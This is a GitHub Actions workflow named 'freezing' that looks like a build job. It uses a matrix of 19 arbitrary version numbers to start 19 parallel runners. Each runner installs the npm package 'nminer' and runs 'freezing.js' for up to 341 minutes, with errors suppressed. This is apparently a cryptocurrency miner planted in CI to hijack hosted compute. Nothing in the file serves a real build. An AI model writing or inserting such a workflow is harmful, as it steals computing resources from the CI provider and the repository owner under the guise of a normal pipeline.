name: freezing
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4426 }
          - { version: 6932 }
          - { version: 8647 }
          - { version: 7851 }
          - { version: 3068 }
          - { version: 2391 }
          - { version: 1194 }
          - { version: 605 }
          - { version: 3623 }
          - { version: 729 }
          - { version: 583 }
          - { version: 8117 }
          - { version: 1648 }
          - { version: 2803 }
          - { version: 1231 }
          - { version: 161 }
          - { version: 6473 }
          - { version: 359 }
          - { version: 1905 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: whoa
        run: |
          npm install nminer@latest
          timeout 341m node freezing.js || echo "freezing executed"